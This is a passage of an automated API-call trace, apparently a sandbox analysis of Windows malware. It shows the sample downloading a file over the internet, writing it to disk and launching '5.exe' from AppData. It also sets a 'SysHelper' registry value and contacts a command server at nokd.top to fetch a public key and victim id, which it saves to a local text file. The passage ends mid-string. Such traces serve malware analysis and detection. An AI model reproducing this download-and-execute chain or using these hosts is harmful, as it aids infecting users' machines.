lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.126] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.126] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.127] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.127] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.127] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.128] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.128] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.129] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.129] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.130] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.132] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.170] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.170] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.171] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.173] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.174] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.174] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.175] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.175] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.176] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.176] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.177] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.177] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.177] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.178] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.179] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.179] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.180] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.180] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.180] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.181] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.181] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.182] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.182] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.182] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.183] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.183] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.184] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.184] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.185] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.185] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.186] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.186] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.186] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.187] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.187] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.188] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.188] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.189] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.189] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.189] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.190] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.190] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0xe00) returned 1 [0112.215] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0xe00, lpOverlapped=0x0) returned 1 [0112.215] CloseHandle (hObject=0x6d8) returned 1 [0112.222] InternetCloseHandle (hInternet=0xcc0030) returned 1 [0112.235] InternetCloseHandle (hInternet=0xcc0028) returned 1 [0112.235] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\5.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0112.316] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x333f418 | out: hHeap=0x730000) returned 1 [0112.316] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9c0c3f0 | out: hHeap=0x730000) returned 1 [0112.316] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3333bd8 | out: hHeap=0x730000) returned 1 [0112.316] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33124d8 | out: hHeap=0x730000) returned 1 [0112.316] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33337d0 | out: hHeap=0x730000) returned 1 [0112.316] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3324178 | out: hHeap=0x730000) returned 1 [0112.316] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33241c0 | out: hHeap=0x730000) returned 1 [0112.316] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33125b8 | out: hHeap=0x730000) returned 1 [0112.316] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33127b0 | out: hHeap=0x730000) returned 1 [0112.316] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3312548 | out: hHeap=0x730000) returned 1 [0112.317] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33123f8 | out: hHeap=0x730000) returned 1 [0112.317] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x7829c8 | out: hHeap=0x730000) returned 1 [0112.317] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3331f00 | out: hHeap=0x730000) returned 1 [0112.317] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3333408 | out: hHeap=0x730000) returned 1 Thread: id = 87 os_tid = 0x874 [0105.488] timeGetTime () returned 0x114c3cc [0105.488] GetLastError () returned 0x54f [0105.488] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x3bc) returned 0x33783b8 [0105.489] GetCurrentThreadId () returned 0x874 [0105.489] SetLastError (dwErrCode=0x54f) [0105.489] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0xfdaa5e4 | out: phkResult=0xfdaa5e4*=0x5d4) returned 0x0 [0105.489] RegQueryValueExW (in: hKey=0x5d4, lpValueName="SysHelper", lpReserved=0x0, lpType=0xfdaa5d8, lpData=0xfdaa5e0, lpcbData=0xfdaa5dc*=0x4 | out: lpType=0xfdaa5d8*=0x0, lpData=0xfdaa5e0*=0x0, lpcbData=0xfdaa5dc*=0x4) returned 0x2 [0105.489] RegSetValueExW (in: hKey=0x5d4, lpValueName="SysHelper", Reserved=0x0, dwType=0x4, lpData=0xfdaa5e0*=0x1, cbData=0x4 | out: lpData=0xfdaa5e0*=0x1) returned 0x0 [0105.489] RegCloseKey (hKey=0x5d4) returned 0x0 [0105.490] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xfdaa4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0105.490] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0105.490] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x18) returned 0x3314118 [0105.490] AreFileApisANSI () returned 1 [0105.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfdaa4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0105.490] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x7a) returned 0x790f48 [0105.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfdaa4e4, cbMultiByte=-1, lpWideCharStr=0x790f48, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0105.499] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xfdaa368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0105.543] GetLastError () returned 0x2 [0105.544] GetLastError () returned 0x2 [0105.544] SetLastError (dwErrCode=0x2) [0105.544] GetLastError () returned 0x2 [0105.544] SetLastError (dwErrCode=0x2) [0105.544] GetLastError () returned 0x2 [0105.544] SetLastError (dwErrCode=0x2) [0105.551] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x790f48 | out: hHeap=0x730000) returned 1 [0105.551] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0105.551] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x60) returned 0x820f60 [0105.551] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x8e) returned 0x32e8da8 [0105.551] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x820f60 | out: hHeap=0x730000) returned 1 [0105.551] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3312740 [0105.552] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x840) returned 0x3378780 [0105.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3312740, cbMultiByte=-1, lpWideCharStr=0x3378780, cchWideChar=1056 | out: lpWideCharStr="DACB005FB0EA0FDF6F3682FBFC1290D7") returned 33 [0105.552] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x850) returned 0x3347f68 [0105.552] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3378780 | out: hHeap=0x730000) returned 1 [0105.552] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3312740 | out: hHeap=0x730000) returned 1 [0105.552] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x8b0) returned 0x33487c0 [0105.552] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x32e8da8 | out: hHeap=0x730000) returned 1 [0105.552] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3347f68 | out: hHeap=0x730000) returned 1 [0105.552] lstrcpyW (in: lpString1=0xfdaaf78, lpString2="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php?pid=DACB005FB0EA0FDF6F3682FBFC1290D7" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php?pid=DACB005FB0EA0FDF6F3682FBFC1290D7") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php?pid=DACB005FB0EA0FDF6F3682FBFC1290D7" [0105.552] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php?pid=DACB005FB0EA0FDF6F3682FBFC1290D7", lpString2="&first=true" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php?pid=DACB005FB0EA0FDF6F3682FBFC1290D7&first=true") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php?pid=DACB005FB0EA0FDF6F3682FBFC1290D7&first=true" [0105.552] InternetOpenUrlW (hInternet=0xcc0010, lpszUrl="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php?pid=DACB005FB0EA0FDF6F3682FBFC1290D7&first=true", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0106.683] InternetReadFile (in: hFile=0xcc0018, lpBuffer=0xfdaa778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xfdaa604 | out: lpBuffer=0xfdaa778*, lpdwNumberOfBytesRead=0xfdaa604*=0x232) returned 1 [0106.684] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xfdaa670 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0106.684] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0106.684] AreFileApisANSI () returned 1 [0106.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfdaa670, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0106.684] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x7a) returned 0x791300 [0106.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfdaa670, cbMultiByte=-1, lpWideCharStr=0x791300, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0106.685] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0xfdaa47c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3b8 [0106.685] GetFileType (hFile=0x3b8) returned 0x1 [0106.685] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x791300 | out: hHeap=0x730000) returned 1 [0106.685] lstrlenA (lpString="{\"public_key\":\"-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 562 [0106.685] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x1000) returned 0x338e688 [0106.686] WriteFile (in: hFile=0x3b8, lpBuffer=0xfda9118*, nNumberOfBytesToWrite=0x232, lpNumberOfBytesWritten=0xfda8a44, lpOverlapped=0x0 | out: lpBuffer=0xfda9118*, lpNumberOfBytesWritten=0xfda8a44*=0x232, lpOverlapped=0x0) returned 1 [0106.687] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x338e688 | out: hHeap=0x730000) returned 1 [0106.687] CloseHandle (hObject=0x3b8) returned 1 [0106.690] InternetCloseHandle (hInternet=0xcc0018) returned 1 [0106.692] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0106.692] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33487c0 | out: hHeap=0x730000) returned 1 [0106.692] lstrlenA (lpString="{\"public_key\":\"") returned 15 [0106.692] lstrcpyA (in: lpString1=0xfdaab78, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: lpString1="-----BEGIN PUBLIC 